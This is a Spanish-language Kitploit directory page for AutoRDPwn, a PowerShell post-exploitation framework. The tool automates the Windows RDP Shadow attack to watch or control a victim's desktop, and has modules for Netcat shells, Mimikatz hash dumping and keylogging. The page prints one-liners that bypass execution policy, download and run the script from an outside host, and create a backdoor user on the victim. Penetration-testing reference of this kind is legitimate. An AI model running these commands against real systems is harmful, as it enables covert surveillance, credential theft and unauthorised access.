Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
AutoRDPwn — El Framework de Ataque Shadow | Kitploit
Herramientas/GitHubGitHub/joelgmsec/autordpwn
Descifrado de ContraseñasEscalada de PrivilegiosGeneración de PayloadsMovimiento LateralPost-ExplotaciónPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubjoelgmsec/autordpwn

AutoRDPwn

El Framework de Ataque Shadow

Ver Repositorio
1.1k499hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

AutoRDPwn

AutoRDPwn es un framework de post-explotación creado en Powershell, diseñado principalmente para automatizar el ataque Shadow en computadoras Microsoft Windows. Esta vulnerabilidad (listada como una característica por Microsoft) permite a un atacante remoto ver el escritorio de su víctima sin su consentimiento, e incluso controlarlo a demanda, utilizando herramientas nativas del propio sistema operativo.

Gracias a los módulos adicionales, es posible obtener un shell remoto a través de Netcat, volcar hashes del sistema con Mimikatz, cargar un keylogger remoto y mucho más. Todo esto, a través de un menú completamente intuitivo en siete idiomas diferentes.

Además, es posible usarlo en una reverse shell a través de una serie de parámetros que se describen en la sección de uso.

Requisitos

Powershell 4.0 o superior

Cambios

Versión 5.1

• Muchos errores corregidos

• Mejoras estéticas y tiempos de espera mejorados

• Conexión Proxy-Aware a través de la configuración del sistema

• Ahora es posible usar la herramienta sin conexión descargando el archivo .zip

• Detección automática de idioma presionando la tecla Enter

• Invoke-DCOM ha sido reemplazado por SharpRDP

• PowerUp ha sido reemplazado por Invoke-PrivescCheck

• Creación de la subrutina de limpieza automática en la víctima

• Nuevo módulo disponible: SMB Shell cifrado con AES

• Nuevo módulo disponible: Cambiar usuario con RunAs

*El resto de los cambios se pueden consultar en el archivo CHANGELOG

Uso

Esta aplicación se puede usar de forma local, remota o para pivotar entre equipos.

Cuando se usa de forma remota en una reverse shell, es necesario usar los siguientes parámetros:

Ejecución local en una línea:

root@kitploit:~
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

Ejemplo de ejecución remota en una línea:

root@kitploit:~
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"

La guía detallada de uso se puede encontrar en el siguiente enlace:

https://darkbyte.net/autordpwn-la-guia-definitiva

Capturas de pantalla

AutoRDPwn1_en AutoRDPwn2_en

Licencia

Este proyecto está licenciado bajo la licencia GNU 3.0 - consulte el archivo LICENSE para más detalles.

Créditos y Agradecimientos

Este framework ha sido creado y diseñado desde cero por Joel Gámez Molina // @JoelGMSec

Algunos módulos usan código, scripts y herramientas de terceros, particularmente:

• Chachi-Enumerator by Luis Vacas --> https://github.com/Hackplayers/PsCabesha-tools

• Invoke-Phant0m by Halil Dalabasmaz --> https://github.com/hlldz/Invoke-Phant0m

• Invoke-PowerShellTcp by Nikhil "SamratAshok" Mittal --> https://github.com/samratashok/nishang

• Invoke-TheHash by Kevin Robertson --> https://github.com/Kevin-Robertson/Invoke-TheHash

• Mimikatz by Benjamin Delpy --> https://github.com/gentilkiwi/mimikatz

• PsExec by Mark Russinovich --> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

• RDP Wrapper by Stas'M Corp. --> https://github.com/stascorp/rdpwrap

• SharpRDP by Steven F --> https://github.com/0xthirteen/SharpRDP

Y muchos más, que no caben aquí.. Gracias a todos ellos y su excelente trabajo.

Contacto

Este software no ofrece ningún tipo de garantía. Su uso es exclusivo para entornos educativos y/o auditorías de seguridad con el consentimiento correspondiente del cliente. No soy responsable de su mal uso ni de cualquier posible daño causado por el mismo.

Para más información, puedes encontrarme en Twitter como @JoelGMSec y en mi blog darkbyte.net.

Apoyo

Puedes apoyar mi trabajo invitándome a un café:

buymeacoffe

Descargar herramienta
ParámetroDescripción
-admin / -noadminDependiendo de los permisos que tengamos, usaremos uno u otro
-noguiEsto evitará cargar el menú y algunos colores, garantizando su funcionalidad
-langElegiremos nuestro idioma (Inglés, Español, Francés, Alemán, Italiano, Ruso o Portugués)
-optionAl igual que con el menú, podemos elegir cómo lanzar el ataque
-shadowDecidiremos si queremos ver o controlar el dispositivo remoto
-createuserEste parámetro es opcional, el usuario AutoRDPwn:AutoRDPwn se creará en la máquina víctima
-nocleanDesactiva el proceso de deshacer todos los cambios en el equipo víctima